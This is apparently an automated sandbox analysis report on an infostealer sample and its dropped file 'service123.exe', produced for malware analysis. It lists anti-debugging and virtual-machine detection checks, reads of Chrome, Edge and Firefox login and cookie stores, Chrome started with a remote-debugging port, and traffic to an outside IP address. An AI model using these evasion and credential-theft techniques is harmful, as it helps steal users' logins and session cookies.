Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080629 second address: 7080666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3E511046B7h 0x00000009 and ecx, 2F2D242Eh 0x0000000f jmp 00007F3E511046B9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080666 second address: 70806BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F3E51171E77h 0x0000000d xchg eax, ebx 0x0000000e jmp 00007F3E51171E76h 0x00000013 xchg eax, esi 0x00000014 jmp 00007F3E51171E70h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F3E51171E6Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70806BE second address: 70806F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 6114h 0x00000007 mov ecx, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d jmp 00007F3E511046AFh 0x00000012 mov esi, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3E511046B0h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70806F1 second address: 7080700 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080700 second address: 7080705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080705 second address: 708073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ecx, 00000000h 0x0000000c jmp 00007F3E51171E6Ch 0x00000011 xchg eax, edi 0x00000012 jmp 00007F3E51171E70h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F3E51171E6Eh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 708073F second address: 7080751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3E511046AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080751 second address: 708075E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 708075E second address: 708077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 mov eax, 00000001h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3E511046ADh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Special instruction interceptor: First address: 153F9C0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Special instruction interceptor: First address: 16D2879 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Special instruction interceptor: First address: 153D47A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Special instruction interceptor: First address: 16D9FEE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Special instruction interceptor: First address: 1756F19 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window / User API: threadDelayed 1345
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window / User API: threadDelayed 804
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window / User API: threadDelayed 872
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window / User API: threadDelayed 882
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window / User API: threadDelayed 969
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window / User API: threadDelayed 1429
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 1894
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 8105
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.0 %
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 3108 Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 6292 Thread sleep count: 1345 > 30
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 6292 Thread sleep time: -2691345s >= -30000s
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 2196 Thread sleep count: 804 > 30
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 2196 Thread sleep time: -1608804s >= -30000s
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 6060 Thread sleep count: 872 > 30
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 6060 Thread sleep time: -1744872s >= -30000s
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 4488 Thread sleep count: 882 > 30
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 4488 Thread sleep time: -1764882s >= -30000s
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 5980 Thread sleep count: 969 > 30
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 5980 Thread sleep time: -1938969s >= -30000s
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 6292 Thread sleep count: 1429 > 30
Source: C:\Users\user\Desktop\PhwUGyok2i.exe TID: 6292 Thread sleep time: -2859429s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6508 Thread sleep count: 1894 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6508 Thread sleep time: -189400s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6508 Thread sleep count: 8105 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6508 Thread sleep time: -810500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default\
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\
Source: Amcache.hve.12.dr Binary or memory string: VMware
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.12.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.12.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000004.00000002.2802480588.0000029ACA3DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.12.dr Binary or memory string: vmci.sys
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr Binary or memory string: VMware VMCI Bus Device
Source: PhwUGyok2i.exe, 00000000.00000003.2398744722.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\PhwUGyok2i.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\PhwUGyok2i.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: NTICE
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: SICE
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: SIWVID
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00168230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 7_2_00168230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_0016116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 7_2_0016116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00161160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 7_2_00161160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_001611A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 7_2_001611A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_001613C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 7_2_001613C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C6684D0 cpuid 7_2_6C6684D0
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: msmpeng.exe
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 7.2.service123.exe.6c5e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 3496, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: global traffic TCP traffic: 192.168.2.6:49714 -> 185.121.15.192:80
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Remote Access Functionality

Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP